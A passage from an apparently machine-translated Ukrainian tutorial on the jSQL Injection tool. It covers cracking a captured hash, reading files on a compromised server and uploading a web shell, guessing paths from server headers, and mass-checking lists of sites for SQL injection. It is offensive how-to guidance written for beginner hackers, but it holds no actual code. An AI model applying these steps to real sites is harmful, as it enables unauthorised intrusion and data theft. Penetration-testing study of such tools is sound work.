8743b52063cd84097a65d1633f5c74f5

Це хеш. Розшифрувати його можна брутфорсом. І ... jSQL Injectionмає вбудований брутфорсер.

6. брутфорсінга хешів за допомогою jSQL Injection

Безсумнівним зручність є те, що не потрібно шукати інші програми. Тут є підтримка безлічі найпопулярніших хешів.

Це не найоптимальніший варіант. Для того, щоб стати гуру в розшифровці хешів, рекомендується Книга «» російською мовою.

Але, звичайно, коли під рукою немає іншої програми чи ні часу на вивчення, jSQL Injection з вбудованою функцією брут-форсу доведеться дуже до речі.

Присутні налаштування: можна задати які символи входять в пароль, діапазон довжини пароля.

7. Операції з файлами після виявлення SQL-ін'єкцій

Крім операцій з базами даних - їх читання і модифікація, в разі виявлення SQL-ін'єкцій можливе виконання наступних файлових операцій:

  • читання файлів на сервері
  • вивантаження нових файлів на сервер
  • вивантаження Шелл на сервер

І все це реалізовано в jSQL Injection!

Є обмеження - у SQL-сервера повинні бути файлові привілеї. У розумних системних адміністраторіввони відключені і доступу до файлової системиотримати не вдасться.

Наявність файлових привілеїв досить просто перевірити. Перейдіть в одну з вкладок (читання файлів, створення шелла, закачування нового файлу) і спробуйте виконати одну з вказаних операцій.

Ще дуже важливе зауваження - нам потрібно знати точний абсолютний шлях до файлу з яким ми будемо працювати - інакше нічого не вийде.

Подивіться на наступний скріншот:

На будь-яку спробу операції з файлом нам відповідають: No FILE privilege(Немає файлових привілеїв). І нічого тут не вдієш.

Якщо замість цього у вас інша помилка:

Problem writing into [названіе_каталога]

Це означає, що ви неправильно вказали абсолютний шлях, в який потрібно записувати файл.

Для того, щоб припустити абсолютний шлях, потрібно, як мінімум, знати операційну системуна якій працює сервер. Для цього перейдіть до вкладки Network.

Такий запис (рядок Win64) Дає підставу нам припустити, що ми маємо справу з ОС Windows:

Keep-Alive: timeout = 5, max = 99 Server: Apache / 2.4.17 (Win64) PHP / 7.0.0RC6 Connection: Keep-Alive Method: HTTP / 1.1 200 OK Content-Length: 353 Date: Fri, 11 Dec 2015 11:48:31 GMT X-Powered-By: PHP / 7.0.0RC6 Content-Type: text / html; charset = UTF-8

Тут у нас якийсь із Unix (* BSD, Linux):

Transfer-Encoding: chunked Date: Fri, 11 Dec 2015 11:57:02 GMT Method: HTTP / 1.1 200 OK Keep-Alive: timeout = 3, max = 100 Connection: keep-alive Content-Type: text / html X- Powered-By: PHP / 5.3.29 Server: Apache / 2.2.31 (Unix)

А тут у нас CentOS:

Method: HTTP / 1.1 200 OK Expires: Thu, 19 Nov +1981 8:52:00 GMT Set-Cookie: PHPSESSID = 9p60gtunrv7g41iurr814h9rd0; path = / Connection: keep-alive X-Cache-Lookup: MISS from t1.hoster.ru:6666 Server: Apache / 2.2.15 (CentOS) X-Powered-By: PHP / 5.4.37 X-Cache: MISS from t1.hoster.ru Cache-Control: no-store, no-cache, must-revalidate, post-check = 0, pre-check = 0 Pragma: no-cache Date: Fri, 11 Dec 2015 12:08:54 GMT Transfer-Encoding: chunked Content-Type: text / html; charset = WINDOWS-1251

У Windows типовою текою для сайтів є C: \ Server \ data \ htdocs \. Але, насправді, якщо хтось «додумався» робити сервер на Windows, то, цілком можливо, ця людина нічого не чув про привілеї. Тому починати спроби варто прямо з каталогу C: / Windows /:

Як бачимо, все пройшло чудово з першого разу.

Але от самі шелли jSQL Injection у мене викликають сумніви. Якщо є файлові привілеї, то ви цілком можете закачати що-небудь з веб-інтерфейсом.

8. Масова перевірка сайтів на SQL-ін'єкції

І навіть ця функція є у jSQL Injection. Все гранично просто - завантажуєте список сайтів (можна імпортувати з файлу), вибираєте ті, які хочете перевірити і натискаєте відповідну кнопку для початку операції.

Висновок по jSQL Injection

jSQL Injection хороший, потужний інструмент для пошуку і подальшого використання знайдених на сайтах SQL-ін'єкцій. Його безсумнівні плюси: простота використання, вбудовані супутні функції. jSQL Injection може стати кращим другом новачка при аналізі веб-сайтів.

З недоліків я б відзначив неможливість редагування баз даних (принаймні я цього функціоналу не знайшов). Як і у всіх інструментів з графічним інтерфейсом, до недоліків цієї програми можна приписати неможливість використання в скриптах. Проте деяка автоматизація можлива і в цій програмі - завдяки вбудованій функції масової перевірки сайтів.

Програмою jSQL Injection користуватися значно зручніше ніж sqlmap. Але sqlmap підтримує більше видів SQL-ін'єкцій, має опції для роботи з файловими файерволами і деякі інші функції.

Підсумок: jSQL Injection - кращий друг початківця хакера.

Довідку за даною програмою в Енциклопедії Kali Linux ви знайдете на цій сторінці: http://kali.tools/?p=706